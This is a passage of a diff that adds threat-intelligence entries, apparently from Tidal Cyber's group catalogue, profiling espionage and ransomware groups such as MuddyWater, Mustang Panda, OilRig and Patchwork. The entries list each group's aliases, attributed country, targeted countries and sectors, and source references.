+ }, + { + "description": "[[Symantec MuddyWater Dec 2018](https://app.tidalcyber.com/references/a8e58ef1-91e1-4f93-b2ff-faa7a6365f5d)][[Anomali Static Kitten February 2021](https://app.tidalcyber.com/references/710ed789-de1f-4601-a8ba-32147827adcb)][[Trend Micro Muddy Water March 2021](https://app.tidalcyber.com/references/16b4b834-2f44-4bac-b810-f92080c41f09)]", + "meta": { + "id": "e5ab4f29-3271-4072-be1a-afc001347179" + }, + "related": [ + { + "dest-uuid": "dcb260d8-9d53-404f-9ff5-dbee2c6effe6", + "type": "similar" + } + ], + "uuid": "9c03d056-8c91-43c9-a9e9-ef7c82b12bca", + "value": "Seedworm" + }, + { + "description": "[[Trend Micro Muddy Water March 2021](https://app.tidalcyber.com/references/16b4b834-2f44-4bac-b810-f92080c41f09)]", + "meta": { + "id": "97647729-3b4c-4d11-a9e7-7a3f4a561ef1" + }, + "related": [ + { + "dest-uuid": "dcb260d8-9d53-404f-9ff5-dbee2c6effe6", + "type": "similar" + } + ], + "uuid": "a862ce87-d79a-485a-8ba2-c7c843e60422", + "value": "Earth Vetala" + }, + { + "description": "[MuddyWater](https://app.tidalcyber.com/groups/dcb260d8-9d53-404f-9ff5-dbee2c6effe6) is a cyber espionage group assessed to be a subordinate element within Iran's Ministry of Intelligence and Security (MOIS).[[CYBERCOM Iranian Intel Cyber January 2022](https://app.tidalcyber.com/references/671e1559-c7dc-4cb4-a9a1-21776f2ae56a)] Since at least 2017, [MuddyWater](https://app.tidalcyber.com/groups/dcb260d8-9d53-404f-9ff5-dbee2c6effe6) has targeted a range of government and private organizations across sectors, including telecommunications, local government, defense, and oil and natural gas organizations, in the Middle East, Asia, Africa, Europe, and North America.[[Unit 42 MuddyWater Nov 2017](https://app.tidalcyber.com/references/dcdee265-2e46-4f40-95c7-6a2683edb23a)][[Symantec MuddyWater Dec 2018](https://app.tidalcyber.com/references/a8e58ef1-91e1-4f93-b2ff-faa7a6365f5d)][[ClearSky MuddyWater Nov 2018](https://app.tidalcyber.com/references/a5f60f45-5df5-407d-9f68-bc5f7c42ee85)][[ClearSky MuddyWater June 2019](https://app.tidalcyber.com/references/9789d60b-a417-42dc-b690-24ccb77b8658)][[Reaqta MuddyWater November 2017](https://app.tidalcyber.com/references/ecd28ccf-edb6-478d-a8f1-da630df42127)][[DHS CISA AA22-055A MuddyWater February 2022](https://app.tidalcyber.com/references/e76570e1-43ab-4819-80bc-895ede67a205)][[Talos MuddyWater Jan 2022](https://app.tidalcyber.com/references/a2d79c6a-16d6-4dbd-b8a5-845dcc36212d)]", + "meta": { + "country": "IR", + "group_attack_id": "G0069", + "observed_countries": [ + "AF", + "AM", + "AT", + "AZ", + "BH", + "BY", + "EG", + "GE", + "IN", + "IR", + "IQ", + "IL", + "JO", + "KW", + "LA", + "LB", + "ML", + "NL", + "OM", + "PK", + "RU", + "SA", + "TJ", + "TH", + "TN", + "TR", + "UA", + "AE", + "US" + ], + "observed_motivations": [ + "Cyber Espionage" + ], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Education", + "Energy", + "Government", + "Technology", + "Telecommunications" + ] + }, + "related": [ + { + "dest-uuid": "a29af069-03c3-4534-b78b-7d1a77ea085b", + "type": "similar" + }, + { + "dest-uuid": "ac24e233-2250-477b-a4cb-6ae018d5836b", + "type": "similar" + }, + { + "dest-uuid": "b4215569-ec22-43ad-839a-67cd09030e2e", + "type": "similar" + }, + { + "dest-uuid": "d4cd493f-b88d-4687-b040-60be94e42a65", + "type": "similar" + }, + { + "dest-uuid": "9c03d056-8c91-43c9-a9e9-ef7c82b12bca", + "type": "similar" + }, + { + "dest-uuid": "a862ce87-d79a-485a-8ba2-c7c843e60422", + "type": "similar" + } + ], + "uuid": "dcb260d8-9d53-404f-9ff5-dbee2c6effe6", + "value": "MuddyWater" + }, + { + "description": "[[Proofpoint TA416 November 2020](https://app.tidalcyber.com/references/f72685de-c775-41c4-94ed-45fd7f873a1d)]", + "meta": { + "id": "a2ae73f8-b7b2-49dd-a5e6-391f1e5d5d84" + }, + "related": [ + { + "dest-uuid": "4a4641b1-7686-49da-8d83-00d8013f4b47", + "type": "similar" + } + ], + "uuid": "04d6b7f4-19e6-41a7-b76a-2e82a7d69e3e", + "value": "TA416" + }, + { + "description": "[[Recorded Future REDDELTA July 2020](https://app.tidalcyber.com/references/e2bc037e-d483-4670-8281-70e51b16effe)][[Proofpoint TA416 Europe March 2022](https://app.tidalcyber.com/references/5731d7e4-dd19-4d08-b493-7b1a467599d3)]", + "meta": { + "id": "1ecf0133-b10d-4621-819d-6efa12db1726" + }, + "related": [ + { + "dest-uuid": "4a4641b1-7686-49da-8d83-00d8013f4b47", + "type": "similar" + } + ], + "uuid": "6e798bec-4713-4242-88ec-e4a77b29db22", + "value": "RedDelta" + }, + { + "description": "[[Secureworks BRONZE PRESIDENT December 2019](https://app.tidalcyber.com/references/019889e0-a2ce-476f-9a31-2fc394de2821)]", + "meta": { + "id": "e8305088-3e86-4126-b24b-fa810d7fc9f0" + }, + "related": [ + { + "dest-uuid": "4a4641b1-7686-49da-8d83-00d8013f4b47", + "type": "similar" + } + ], + "uuid": "ed80cd5e-afc8-4f59-b567-ec97fdc37a37", + "value": "BRONZE PRESIDENT" + }, + { + "description": "[Mustang Panda](https://app.tidalcyber.com/groups/4a4641b1-7686-49da-8d83-00d8013f4b47) is a China-based cyber espionage threat actor that was first observed in 2017 but may have been conducting operations since at least 2014. [Mustang Panda](https://app.tidalcyber.com/groups/4a4641b1-7686-49da-8d83-00d8013f4b47) has targeted government entities, nonprofits, religious, and other non-governmental organizations in the U.S., Europe, Mongolia, Myanmar, Pakistan, and Vietnam, among others.[[Crowdstrike MUSTANG PANDA June 2018](https://app.tidalcyber.com/references/35e72170-b1ec-49c9-aefe-a24fc4302fa6)][[Anomali MUSTANG PANDA October 2019](https://app.tidalcyber.com/references/70277fa4-60a8-475e-993a-c74241b76127)][[Secureworks BRONZE PRESIDENT December 2019](https://app.tidalcyber.com/references/019889e0-a2ce-476f-9a31-2fc394de2821)] ", + "meta": { + "country": "CN", + "group_attack_id": "G0129", + "observed_countries": [ + "AU", + "BD", + "BE", + "CN", + "CY", + "ET", + "DE", + "GR", + "HK", + "IN", + "ID", + "KR", + "MN", + "MM", + "NP", + "PK", + "RU", + "SG", + "ZA", + "SS", + "TW", + "GB", + "US", + "VN" + ], + "observed_motivations": [ + "Cyber Espionage" + ], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Government", + "NGOs", + "Non Profit", + "Think Tanks", + "Travel Services" + ] + }, + "related": [ + { + "dest-uuid": "04d6b7f4-19e6-41a7-b76a-2e82a7d69e3e", + "type": "similar" + }, + { + "dest-uuid": "6e798bec-4713-4242-88ec-e4a77b29db22", + "type": "similar" + }, + { + "dest-uuid": "ed80cd5e-afc8-4f59-b567-ec97fdc37a37", + "type": "similar" + } + ], + "uuid": "4a4641b1-7686-49da-8d83-00d8013f4b47", + "value": "Mustang Panda" + }, + { + "description": "[Naikon](https://app.tidalcyber.com/groups/a80c00b2-b8b6-4780-99bb-df8fe921947d) is assessed to be a state-sponsored cyber espionage group attributed to the Chinese People’s Liberation Army’s (PLA) Chengdu Military Region Second Technical Reconnaissance Bureau (Military Unit Cover Designator 78020).[[CameraShy](https://app.tidalcyber.com/references/9942b6a5-6ffb-4a26-9392-6c8bb9954997)] Active since at least 2010, [Naikon](https://app.tidalcyber.com/groups/a80c00b2-b8b6-4780-99bb-df8fe921947d) has primarily conducted operations against government, military, and civil organizations in Southeast Asia, as well as against international bodies such as the United Nations Development Programme (UNDP) and the Association of Southeast Asian Nations (ASEAN).[[CameraShy](https://app.tidalcyber.com/references/9942b6a5-6ffb-4a26-9392-6c8bb9954997)][[Baumgartner Naikon 2015](https://app.tidalcyber.com/references/09302b4f-7f71-4289-92f6-076c685f0810)] \n\nWhile [Naikon](https://app.tidalcyber.com/groups/a80c00b2-b8b6-4780-99bb-df8fe921947d) shares some characteristics with [APT30](https://app.tidalcyber.com/groups/be45ff95-6c74-4000-bc39-63044673d82f), the two groups do not appear to be exact matches.[[Baumgartner Golovkin Naikon 2015](https://app.tidalcyber.com/references/5163576f-0b2c-49ba-8f34-b7efe3f3f6db)]", + "meta": { + "country": "CN", + "group_attack_id": "G0019", + "observed_countries": [ + "AU", + "BN", + "KH", + "CN", + "IN", + "ID", + "KR", + "LA", + "MY", + "MM", + "NP", + "PH", + "SA", + "SG", + "TH", + "US", + "VN" + ], + "observed_motivations": [ + "Cyber Espionage" + ], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Defense", + "Government" + ] + }, + "related": [ + { + "dest-uuid": "2f1fd017-9df6-4759-91fb-e7039609b5ff", + "type": "similar" + } + ], + "uuid": "a80c00b2-b8b6-4780-99bb-df8fe921947d", + "value": "Naikon" + }, + { + "description": "[NEODYMIUM](https://app.tidalcyber.com/groups/3a660ef3-9954-4252-8946-f903f3f42d0c) is an activity group that conducted a campaign in May 2016 and has heavily targeted Turkish victims. The group has demonstrated similarity to another activity group called [PROMETHIUM](https://app.tidalcyber.com/groups/cc798766-8662-4b55-8536-6d057fbc58f0) due to overlapping victim and campaign characteristics. [[Microsoft NEODYMIUM Dec 2016](https://app.tidalcyber.com/references/87c9f8e4-f8d1-4f19-86ca-6fd18a33890b)] [[Microsoft SIR Vol 21](https://app.tidalcyber.com/references/619b9cf8-7201-45de-9c36-834ccee356a9)] [NEODYMIUM](https://app.tidalcyber.com/groups/3a660ef3-9954-4252-8946-f903f3f42d0c) is reportedly associated closely with [BlackOasis](https://app.tidalcyber.com/groups/428dc121-a593-4981-9127-f958ae0a0fdd) operations, but evidence that the group names are aliases has not been identified. [[CyberScoop BlackOasis Oct 2017](https://app.tidalcyber.com/references/a8224ad5-4688-4382-a3e7-1dd3ed74ebce)]", + "meta": { + "group_attack_id": "G0055", + "observed_countries": [ + "TR" + ], + "observed_motivations": [ + "Cyber Espionage" + ], + "source": "MITRE", + "tags": [], + "target_categories": [] + }, + "related": [ + { + "dest-uuid": "ada08ea8-4517-4eea-aff1-3ad69e5466bb", + "type": "similar" + } + ], + "uuid": "3a660ef3-9954-4252-8946-f903f3f42d0c", + "value": "NEODYMIUM" + }, + { + "description": "[[Security Affairs DustSquad Oct 2018](https://app.tidalcyber.com/references/0e6b019c-cf8e-40a7-9e7c-6a7dc5309dc6)][[Securelist Octopus Oct 2018](https://app.tidalcyber.com/references/77407057-53f1-4fde-bc74-00f73d417f7d)][[SecurityWeek Nomadic Octopus Oct 2018](https://app.tidalcyber.com/references/659f86ef-7e90-42ff-87b7-2e289f9f6cc2)]", + "meta": { + "id": "9179b832-142b-401f-95c0-907544b71dad" + }, + "related": [ + { + "dest-uuid": "5f8c6ee0-f302-403b-b712-f1e3df064c0c", + "type": "similar" + } + ], + "uuid": "2e09d081-dcb5-4b3e-8dca-2b64dc37cc2b", + "value": "DustSquad" + }, + { + "description": "\n[Nomadic Octopus](https://app.tidalcyber.com/groups/5f8c6ee0-f302-403b-b712-f1e3df064c0c) is a Russian-speaking cyber espionage threat group that has primarily targeted Central Asia, including local governments, diplomatic missions, and individuals, since at least 2014. [Nomadic Octopus](https://app.tidalcyber.com/groups/5f8c6ee0-f302-403b-b712-f1e3df064c0c) has been observed conducting campaigns involving Android and Windows malware, mainly using the Delphi programming language, and building custom variants.[[Security Affairs DustSquad Oct 2018](https://app.tidalcyber.com/references/0e6b019c-cf8e-40a7-9e7c-6a7dc5309dc6)][[Securelist Octopus Oct 2018](https://app.tidalcyber.com/references/77407057-53f1-4fde-bc74-00f73d417f7d)][[ESET Nomadic Octopus 2018](https://app.tidalcyber.com/references/50dcb3f0-1461-453a-aab9-38c2e259173f)]", + "meta": { + "group_attack_id": "G0133", + "observed_countries": [], + "observed_motivations": [ + "Cyber Espionage" + ], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Government" + ] + }, + "related": [ + { + "dest-uuid": "2e09d081-dcb5-4b3e-8dca-2b64dc37cc2b", + "type": "similar" + } + ], + "uuid": "5f8c6ee0-f302-403b-b712-f1e3df064c0c", + "value": "Nomadic Octopus" + }, + { + "description": "[[Crowdstrike Helix Kitten Nov 2018](https://app.tidalcyber.com/references/3fc0d7ad-6283-4cfd-b72f-5ce47594531e)]", + "meta": { + "id": "951b761f-1c6f-4321-8c37-84c857408b06" + }, + "related": [ + { + "dest-uuid": "d01abdb1-0378-4654-aa38-1a4a292703e2", + "type": "similar" + } + ], + "uuid": "d840e923-ef0c-45d6-926f-e12016d1fe54", + "value": "IRN2" + }, + { + "description": "This group was previously tracked under two distinct groups, APT34 and OilRig, but was combined due to additional reporting giving higher confidence about the overlap of the activity.[[Unit 42 QUADAGENT July 2018](https://app.tidalcyber.com/references/320f49df-7b0a-4a6a-8542-17b0f56c94c9)][[FireEye APT34 Dec 2017](https://app.tidalcyber.com/references/88f41728-08ad-4cd8-a418-895738d68b04)][[Check Point APT34 April 2021](https://app.tidalcyber.com/references/593e8f9f-88ec-4bdc-90c3-1a320fa8a041)]", + "meta": { + "id": "6c8291a4-b1f2-4ba7-b803-4a0c211169e9" + }, + "related": [ + { + "dest-uuid": "d01abdb1-0378-4654-aa38-1a4a292703e2", + "type": "similar" + } + ], + "uuid": "17ac9e60-dfad-4ee5-a61c-7b7ee6686a73", + "value": "APT34" + }, + { + "description": "[[Secureworks COBALT GYPSY Threat Profile](https://app.tidalcyber.com/references/f1c21834-7536-430b-8539-e68373718b4d)]", + "meta": { + "id": "d5f99e60-e704-4e97-824e-cc3b42236f66" + }, + "related": [ + { + "dest-uuid": "d01abdb1-0378-4654-aa38-1a4a292703e2", + "type": "similar" + } + ], + "uuid": "e8d4a791-a117-4e1e-8a7a-8a90422d4a90", + "value": "COBALT GYPSY" + }, + { + "description": "[[Unit 42 QUADAGENT July 2018](https://app.tidalcyber.com/references/320f49df-7b0a-4a6a-8542-17b0f56c94c9)][[Crowdstrike Helix Kitten Nov 2018](https://app.tidalcyber.com/references/3fc0d7ad-6283-4cfd-b72f-5ce47594531e)]", + "meta": { + "id": "3babdce3-2d7b-4f15-971d-d1272690e9f4" + }, + "related": [ + { + "dest-uuid": "d01abdb1-0378-4654-aa38-1a4a292703e2", + "type": "similar" + } + ], + "uuid": "8779d808-ed34-44bc-a3e3-8b0954bc8022", + "value": "Helix Kitten" + }, + { + "description": "[[Unit42 OilRig Playbook 2023](https://app.tidalcyber.com/references/e38902bb-9bab-5beb-817b-668a67a76541)]", + "meta": { + "id": "20f00c34-6797-5a00-b03f-80d47bc6a650" + }, + "related": [ + { + "dest-uuid": "d01abdb1-0378-4654-aa38-1a4a292703e2", + "type": "similar" + } + ], + "uuid": "9cbeb785-fe7e-5bf7-b860-bf1bf8bf7f09", + "value": "Evasive Serpens" + }, + { + "description": "[OilRig](https://app.tidalcyber.com/groups/d01abdb1-0378-4654-aa38-1a4a292703e2) is a suspected Iranian threat group that has targeted Middle Eastern and international victims since at least 2014. The group has targeted a variety of sectors, including financial, government, energy, chemical, and telecommunications. It appears the group carries out supply chain attacks, leveraging the trust relationship between organizations to attack their primary targets. FireEye assesses that the group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests.[[Palo Alto OilRig April 2017](https://app.tidalcyber.com/references/fb561cdd-03f6-4867-b5b5-7e4deb11f0d0)][[ClearSky OilRig Jan 2017](https://app.tidalcyber.com/references/f19f9ad4-bb31-443b-9c26-87946469a0c3)][[Palo Alto OilRig May 2016](https://app.tidalcyber.com/references/53836b95-a30a-4e95-8e19-e2bb2f18c738)][[Palo Alto OilRig Oct 2016](https://app.tidalcyber.com/references/14bbb07b-caeb-4d17-8e54-047322a5930c)][[Unit42 OilRig Playbook 2023](https://app.tidalcyber.com/references/e38902bb-9bab-5beb-817b-668a67a76541)][[FireEye APT34 Dec 2017](https://app.tidalcyber.com/references/88f41728-08ad-4cd8-a418-895738d68b04)][[Unit 42 QUADAGENT July 2018](https://app.tidalcyber.com/references/320f49df-7b0a-4a6a-8542-17b0f56c94c9)]", + "meta": { + "country": "IR", + "group_attack_id": "G0049", + "observed_countries": [ + "AZ", + "IQ", + "IL", + "KW", + "LB", + "MU", + "PK", + "QA", + "SA", + "TR", + "AE", + "GB", + "US" + ], + "observed_motivations": [], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Banks", + "Chemical", + "Energy", + "Financial Services", + "Government", + "Technology", + "Telecommunications" + ] + }, + "related": [ + { + "dest-uuid": "42be2a84-5a5c-4c6d-9864-3f09d75bb0ba", + "type": "similar" + }, + { + "dest-uuid": "d840e923-ef0c-45d6-926f-e12016d1fe54", + "type": "similar" + }, + { + "dest-uuid": "17ac9e60-dfad-4ee5-a61c-7b7ee6686a73", + "type": "similar" + }, + { + "dest-uuid": "e8d4a791-a117-4e1e-8a7a-8a90422d4a90", + "type": "similar" + }, + { + "dest-uuid": "8779d808-ed34-44bc-a3e3-8b0954bc8022", + "type": "similar" + }, + { + "dest-uuid": "9cbeb785-fe7e-5bf7-b860-bf1bf8bf7f09", + "type": "similar" + } + ], + "uuid": "d01abdb1-0378-4654-aa38-1a4a292703e2", + "value": "OilRig" + }, + { + "description": "[Orangeworm](https://app.tidalcyber.com/groups/863b7013-133d-4a82-93d2-51b53a8fd30e) is a group that has targeted organizations in the healthcare sector in the United States, Europe, and Asia since at least 2015, likely for the purpose of corporate espionage.[[Symantec Orangeworm April 2018](https://app.tidalcyber.com/references/eee5efa1-bbc6-44eb-8fae-23002f351605)]", + "meta": { + "group_attack_id": "G0071", + "observed_countries": [ + "BE", + "BR", + "CA", + "CL", + "CN", + "FR", + "DE", + "HK", + "HU", + "IN", + "JP", + "MY", + "NL", + "NO", + "PH", + "PL", + "PT", + "SA", + "ES", + "SE", + "CH", + "TR", + "GB", + "US" + ], + "observed_motivations": [ + "Cyber Espionage" + ], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Healthcare", + "Pharmaceuticals" + ] + }, + "related": [], + "uuid": "863b7013-133d-4a82-93d2-51b53a8fd30e", + "value": "Orangeworm" + }, + { + "description": "[[Securelist Dropping Elephant](https://app.tidalcyber.com/references/2efa655f-ebd3-459b-9fd7-712d3f4ba1f8)]", + "meta": { + "id": "77abe6f0-7cf8-4dd5-8856-b75d1372ddd9" + }, + "related": [ + { + "dest-uuid": "32385eba-7bbf-439e-acf2-83040e97165a", + "type": "similar" + } + ], + "uuid": "938d3a61-cb8b-4ec3-9bf0-f27833a0f96f", + "value": "Chinastrats" + }, + { + "description": "MONSOON is the name of an espionage campaign; we use it here to refer to the actor group behind the campaign. [[Forcepoint Monsoon](https://app.tidalcyber.com/references/ea64a3a5-a248-44bb-98cd-f7e3d4c23d4e)] [[PaloAlto Patchwork Mar 2018](https://app.tidalcyber.com/references/2609e461-1e23-4dc2-aa44-d09f4acb8c6e)]", + "meta": { + "id": "6f6fbe52-56f6-4475-a705-76931c425513" + }, + "related": [ + { + "dest-uuid": "32385eba-7bbf-439e-acf2-83040e97165a", + "type": "similar" + } + ], + "uuid": "23ef9d36-8cb3-4992-abda-709777b97cc3", + "value": "MONSOON" + }, + { + "description": "It is believed that the actors behind [Patchwork](https://app.tidalcyber.com/groups/32385eba-7bbf-439e-acf2-83040e97165a) are the same actors behind Operation Hangover. [[Forcepoint Monsoon](https://app.tidalcyber.com/references/ea64a3a5-a248-44bb-98cd-f7e3d4c23d4e)] [[Operation Hangover May 2013](https://app.tidalcyber.com/references/fd581c0c-d93e-4396-a372-99cde3cd0c7c)]", + "meta": { + "id": "9e9ba191-f9e6-441e-83bd-6c91051f1c4d" + }, + "related": [ + { + "dest-uuid": "32385eba-7bbf-439e-acf2-83040e97165a", + "type": "similar" + } + ], + "uuid": "364de163-80dc-4f0f-8b42-837ae97a2088", + "value": "Operation Hangover" + }, + { + "description": "[Patchwork](https://app.tidalcyber.com/groups/32385eba-7bbf-439e-acf2-83040e97165a) and the Hangover Group have both been referenced as aliases for the threat group associated with Operation Monsoon.[[PaloAlto Patchwork Mar 2018](https://app.tidalcyber.com/references/2609e461-1e23-4dc2-aa44-d09f4acb8c6e)][[Unit 42 BackConfig May 2020](https://app.tidalcyber.com/references/f26629db-c641-4b6b-abbf-b55b9cc91cf1)][[Forcepoint Monsoon](https://app.tidalcyber.com/references/ea64a3a5-a248-44bb-98cd-f7e3d4c23d4e)]", + "meta": { + "id": "65af7d73-1452-4c1c-bf48-344adc7e2bde" + }, + "related": [ + { + "dest-uuid": "32385eba-7bbf-439e-acf2-83040e97165a", + "type": "similar" + } + ], + "uuid": "2c043629-b8f6-475f-a436-abc01aad9421", + "value": "Hangover Group" + }, + { + "description": "[[Symantec Patchwork](https://app.tidalcyber.com/references/a6172463-56e2-49f2-856d-f4f8320d7c6e)] [[Securelist Dropping Elephant](https://app.tidalcyber.com/references/2efa655f-ebd3-459b-9fd7-712d3f4ba1f8)] [[PaloAlto Patchwork Mar 2018](https://app.tidalcyber.com/references/2609e461-1e23-4dc2-aa44-d09f4acb8c6e)] [[Volexity Patchwork June 2018](https://app.tidalcyber.com/references/d3ed7dd9-0941-4160-aa6a-c0244c63560f)]", + "meta": { + "id": "68d9b964-3996-43b9-aabc-e3b3a8a8f4ce" + }, + "related": [ + { + "dest-uuid": "32385eba-7bbf-439e-acf2-83040e97165a", + "type": "similar" + } + ], + "uuid": "8f4890c6-6db0-4536-8624-35cb02bb94a7", + "value": "Dropping Elephant" + }, + { + "description": "[Patchwork](https://app.tidalcyber.com/groups/32385eba-7bbf-439e-acf2-83040e97165a) is a cyber espionage group that was first observed in December 2015. While the group has not been definitively attributed, circumstantial evidence suggests the group may be a pro-Indian or Indian entity. [Patchwork](https://app.tidalcyber.com/groups/32385eba-7bbf-439e-acf2-83040e97165a) has been seen targeting industries related to diplomatic and government agencies. Much of the code used by this group was copied and pasted from online forums. [Patchwork](https://app.tidalcyber.com/groups/32385eba-7bbf-439e-acf2-83040e97165a) was also seen operating spearphishing campaigns targeting U.S. think tank groups in March and April of 2018.[[Cymmetria Patchwork](https://app.tidalcyber.com/references/d4e43b2c-a858-4285-984f-f59db5c657bd)] [[Symantec Patchwork](https://app.tidalcyber.com/references/a6172463-56e2-49f2-856d-f4f8320d7c6e)][[TrendMicro Patchwork Dec 2017](https://app.tidalcyber.com/references/15465b26-99e1-4956-8c81-cda3388169b8)][[Volexity Patchwork June 2018](https://app.tidalcyber.com/references/d3ed7dd9-0941-4160-aa6a-c0244c63560f)]", + "meta": { + "group_attack_id": "G0040", + "observed_countries": [ + "CN", + "JP", + "GB", + "US" + ], + "observed_motivations": [], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Defense", + "Energy", + "Financial Services", + "Government", + "NGOs", + "Technology", + "Think Tanks" + ] + }, + "related": [ + { + "dest-uuid": "18d473a5-831b-47a5-97a1-a32156299825", + "type": "similar" + }, + { + "dest-uuid": "938d3a61-cb8b-4ec3-9bf0-f27833a0f96f", + "type": "similar" + }, + { + "dest-uuid": "23ef9d36-8cb3-4992-abda-709777b97cc3", + "type": "similar" + }, + { + "dest-uuid": "364de163-80dc-4f0f-8b42-837ae97a2088", + "type": "similar" + }, + { + "dest-uuid": "2c043629-b8f6-475f-a436-abc01aad9421", + "type": "similar" + }, + { + "dest-uuid": "8f4890c6-6db0-4536-8624-35cb02bb94a7", + "type": "similar" + } + ], + "uuid": "32385eba-7bbf-439e-acf2-83040e97165a", + "value": "Patchwork" + }, + { + "description": "[PittyTiger](https://app.tidalcyber.com/groups/60936d3c-37ed-4116-a407-868da3aa4446) is a threat group believed to operate out of China that uses multiple different types of malware to maintain command and control.[[Bizeul 2014](https://app.tidalcyber.com/references/a4617ef4-e6d2-47e7-8f81-68e7380279bf)][[Villeneuve 2014](https://app.tidalcyber.com/references/a156e24e-0da5-4ac7-b914-29f2f05e7d6f)]", + "meta": { + "country": "CN", + "group_attack_id": "G0011", + "observed_countries": [ + "TW" + ], + "observed_motivations": [], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Defense", + "Energy", + "Telecommunications" + ] + }, + "related": [ + { + "dest-uuid": "4d37813c-b8e9-4e58-a758-03168d8aa189", + "type": "similar" + } + ], + "uuid": "60936d3c-37ed-4116-a407-868da3aa4446", + "value": "PittyTiger" + }, + { + "description": "[PLATINUM](https://app.tidalcyber.com/groups/f036b992-4c3f-47b7-a458-94ac133bce74) is an activity group that has targeted victims since at least 2009. The group has focused on targets associated with governments and related organizations in South and Southeast Asia. [[Microsoft PLATINUM April 2016](https://app.tidalcyber.com/references/d0ec5037-aa7f-48ee-8d37-ff8fb2c8c297)]", + "meta": { + "group_attack_id": "G0068", + "observed_countries": [ + "CN", + "IN", + "ID", + "MY", + "SG", + "TH" + ], + "observed_motivations": [], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Defense", + "Education", + "Government", + "Telecommunications" + ] + }, + "related": [ + { + "dest-uuid": "1fc5671f-5757-43bf-8d6d-a9a93b03713a", + "type": "similar" + } + ], + "uuid": "f036b992-4c3f-47b7-a458-94ac133bce74", + "value": "PLATINUM" + }, + { + "description": "*Operationalize this intelligence by pivoting to relevant defensive resources via the Techniques below. Alternatively, use the **Add to Matrix** button above, then overlay entire sets of capabilities from your own defensive stack to identify threat overlaps & potential gaps (watch a [60-second tutorial here](https://www.youtube.com/watch?v=4jBo3XLO01E)).*\n\nPlay is a ransomware operation first observed in mid-2022. Security researchers have observed filename, filepath, and TTP overlaps between Play and Hive and Nokoyawa ransomwares, which themselves are believed to be linked.[[Trend Micro Play Playbook September 06 2022](/references/2d2b527d-25b0-4b58-9ae6-c87060b64069)] According to publicly available ransomware extortion threat data, Play has claimed more than 300 victims from a wide range of sectors on its data leak site since December 2022.[[GitHub ransomwatch](/references/62037959-58e4-475a-bb91-ff360d20c1d7)]\n\n**Malpedia (Research)**: https://malpedia.caad.fkie.fraunhofer.de/details/win.play\n\n**PulseDive (IOCs)**: https://pulsedive.com/threat/PlayCrypt", + "meta": { + "group_attack_id": "G5018", + "observed_countries": [ + "AR", + "BE", + "CA", + "CZ", + "FR", + "DE", + "IT", + "KR", + "NO", + "SE", + "AE", + "GB", + "US", + "VE" + ], + "observed_motivations": [ + "Financial Gain" + ], + "owner": "TidalCyberIan", + "source": "Tidal Cyber", + "tags": [ + "17864218-bc4f-4564-8abf-97c988eea9f7", + "b6458e46-650e-4e96-8e68-8a9d70bcf045", + "bac51672-8240-4182-9087-23626023e509", + "2743d495-7728-4a75-9e5f-b64854039792" + ], + "target_categories": [ + "Automotive", + "Construction", + "Energy", + "Financial Services", + "Government", + "Legal", + "Media", + "Non Profit", + "Retail", + "Technology", + "Transportation" + ] + }, + "related": [], + "uuid": "6eb50f82-86cc-4eff-b1d1-66e1c6fd74f3", + "value": "Play Ransomware Actors" + }, + { + "description": "[POLONIUM](https://app.tidalcyber.com/groups/7fbd7514-76e9-4696-8c66-9f95546e3315) is a Lebanon-based group that has primarily targeted Israeli organizations, including critical manufacturing, information technology, and defense industry companies, since at least February 2022. Security researchers assess [POLONIUM](https://app.tidalcyber.com/groups/7fbd7514-76e9-4696-8c66-9f95546e3315) has coordinated their operations with multiple actors affiliated with Iran’s Ministry of Intelligence and Security (MOIS), based on victim overlap as well as common techniques and tooling.[[Microsoft POLONIUM June 2022](https://app.tidalcyber.com/references/689ff1ab-9fed-4aa2-8e5e-78dac31e6fbd)]", + "meta": { + "group_attack_id": "G1005", + "observed_countries": [], + "observed_motivations": [], + "source": "MITRE", + "tags": [], + "target_categories": [] + }, + "related": [], + "uuid": "7fbd7514-76e9-4696-8c66-9f95546e3315", + "value": "POLONIUM" + }, + { + "description": "[Poseidon Group](https://app.tidalcyber.com/groups/553e2b7b-170c-4eb5-812b-ea33fe1dd4a0) is a Portuguese-speaking threat group that has been active since at least 2005. The group has a history of using information exfiltrated from victims to blackmail victim companies into contracting the [Poseidon Group](https://app.tidalcyber.com/groups/553e2b7b-170c-4eb5-812b-ea33fe1dd4a0) as a security firm. [[Kaspersky Poseidon Group](https://app.tidalcyber.com/references/e53bc63e-986f-4d48-a6b7-ed8e93494ed5)]", + "meta": { + "group_attack_id": "G0033", + "observed_countries": [ + "BR", + "FR", + "IN", + "KZ", + "RU", + "AE", + "US" + ], + "observed_motivations": [ + "Cyber Espionage" + ], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Energy", + "Entertainment", + "Financial Services", + "Manufacturing", + "Utilities" + ] + }, + "related": [ + { + "dest-uuid": "5fc09923-fcff-4e81-9cae-4518ef31cf4d", + "type": "similar" + } + ], + "uuid": "553e2b7b-170c-4eb5-812b-ea33fe1dd4a0", + "value": "Poseidon Group" + }, + { + "description": "The name StrongPity has also been used to describe the group and the malware used by the group.[[Bitdefender StrongPity June 2020](https://app.tidalcyber.com/references/7d2e20f2-20ba-4d51-9495-034c07be41a8)][[Talos Promethium June 2020](https://app.tidalcyber.com/references/188d990e-f0be-40f2-90f3-913dfe687d27)]", + "meta": { + "id": "225f451f-621e-406d-94ee-bcff9ee39367" + }, + "related": [ + { + "dest-uuid": "cc798766-8662-4b55-8536-6d057fbc58f0", + "type": "similar" + } + ], + "uuid": "aa5e87f3-6e59-4abf-aeba-a49eb9d495f3", + "value": "StrongPity" + }, + { + "description": "[PROMETHIUM](https://app.tidalcyber.com/groups/cc798766-8662-4b55-8536-6d057fbc58f0) is an activity group focused on espionage that has been active since at least 2012. The group has conducted operations globally with a heavy emphasis on Turkish targets. [PROMETHIUM](https://app.tidalcyber.com/groups/cc798766-8662-4b55-8536-6d057fbc58f0) has demonstrated similarity to another activity group called [NEODYMIUM](https://app.tidalcyber.com/groups/3a660ef3-9954-4252-8946-f903f3f42d0c) due to overlapping victim and campaign characteristics.[[Microsoft NEODYMIUM Dec 